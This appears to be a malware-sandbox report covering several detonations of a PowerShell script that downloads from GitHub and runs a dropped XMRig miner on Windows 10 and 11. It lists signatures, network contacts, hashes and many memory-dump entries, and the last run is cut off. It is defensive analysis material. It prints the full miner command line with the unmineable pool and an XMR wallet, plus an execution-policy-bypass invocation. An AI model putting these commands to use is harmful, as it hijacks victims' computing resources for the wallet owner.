memory/4840-93-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-94-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-95-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-96-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-97-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-98-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-99-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-100-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-101-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-102-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-103-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-104-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-105-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-106-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-107-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-108-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-109-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-110-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-111-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-112-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-113-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-114-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-115-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

memory/4840-116-0x00007FF711080000-0x00007FF711CB3000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:38

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1783s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 253.15.104.51.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp

Files

memory/3200-2-0x00007FFC0C723000-0x00007FFC0C724000-memory.dmp

memory/3200-5-0x000001D478220000-0x000001D478242000-memory.dmp

memory/3200-6-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp

memory/3200-9-0x000001D4783D0000-0x000001D478446000-memory.dmp

memory/3200-10-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y2l4olqg.t1s.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3200-25-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp

memory/3200-48-0x000001D4783B0000-0x000001D4783C2000-memory.dmp

memory/3200-61-0x000001D4783A0000-0x000001D4783AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3372-90-0x000002CF4A660000-0x000002CF4A680000-memory.dmp

memory/3200-91-0x00007FFC0C723000-0x00007FFC0C724000-memory.dmp

memory/3200-93-0x00007FFC0C720000-0x00007FFC0D10C000-memory.dmp

memory/3372-92-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-94-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-95-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-96-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-97-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-98-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-99-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-100-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-101-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-102-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-103-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-104-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-105-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-106-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-107-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-108-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-109-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-110-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-111-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-112-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-113-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-114-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-115-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-116-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-117-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-118-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-119-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-120-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-121-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-122-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-123-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-124-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-125-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-126-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-127-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-128-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-129-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-130-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-131-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-132-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-133-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-134-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-135-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-136-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-137-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-138-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-139-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-140-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-141-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-142-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-143-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-144-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-145-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-146-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-147-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-148-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-149-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-150-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-151-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-152-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-153-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-154-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

memory/3372-155-0x00007FF7509A0000-0x00007FF7515D3000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:59

Platform

win11-20240508-en

Max time kernel

1791s

Max time network

1770s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.227.11:443 tcp

Files

memory/2092-0-0x00007FFB2CC93000-0x00007FFB2CC95000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_phr4k5s2.hx3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2092-6-0x000001DDE19E0000-0x000001DDE1A02000-memory.dmp

memory/2092-10-0x00007FFB2CC90000-0x00007FFB2D752000-memory.dmp

memory/2092-11-0x00007FFB2CC90000-0x00007FFB2D752000-memory.dmp

memory/2092-12-0x00007FFB2CC90000-0x00007FFB2D752000-memory.dmp

memory/2092-14-0x000001DDE1AA0000-0x000001DDE1AB2000-memory.dmp

memory/2092-15-0x000001DDE1A80000-0x000001DDE1A8A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3656-46-0x000002667C0D0000-0x000002667C0F0000-memory.dmp

memory/3656-47-0x000002667D9D0000-0x000002667D9F0000-memory.dmp

memory/3656-48-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/2092-49-0x00007FFB2CC90000-0x00007FFB2D752000-memory.dmp

memory/2092-51-0x00007FFB2CC93000-0x00007FFB2CC95000-memory.dmp

memory/3656-50-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-53-0x000002667D9F0000-0x000002667DA10000-memory.dmp

memory/3656-52-0x000002667DA10000-0x000002667DA30000-memory.dmp

memory/2092-54-0x00007FFB2CC90000-0x00007FFB2D752000-memory.dmp

memory/3656-55-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-56-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-57-0x000002667DA10000-0x000002667DA30000-memory.dmp

memory/3656-58-0x000002667D9F0000-0x000002667DA10000-memory.dmp

memory/3656-59-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-60-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-61-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-62-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-63-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-64-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-65-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-66-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-67-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-68-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-69-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-70-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-71-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-72-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-73-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-74-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-75-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-76-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-77-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-78-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-79-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-80-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-81-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-82-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-83-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-84-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-85-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-86-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-87-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-88-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-89-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-90-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-91-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-92-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-93-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-94-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-95-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-96-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-97-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-98-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-99-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-100-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-101-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-102-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-103-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-104-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-105-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-106-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-107-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-108-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-109-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-110-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-111-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-112-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-113-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-114-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-115-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-116-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

memory/3656-117-0x00007FF7A9C80000-0x00007FF7AA8B3000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 01:54

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1754s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 253.15.104.51.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/4140-3-0x00007FFB5E433000-0x00007FFB5E434000-memory.dmp

memory/4140-5-0x0000015E6AAC0000-0x0000015E6AAE2000-memory.dmp

memory/4140-8-0x00007FFB5E430000-0x00007FFB5EE1C000-memory.dmp

memory/4140-10-0x00007FFB5E430000-0x00007FFB5EE1C000-memory.dmp

memory/4140-9-0x0000015E6AC70000-0x0000015E6ACE6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cnngbxbz.uzz.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
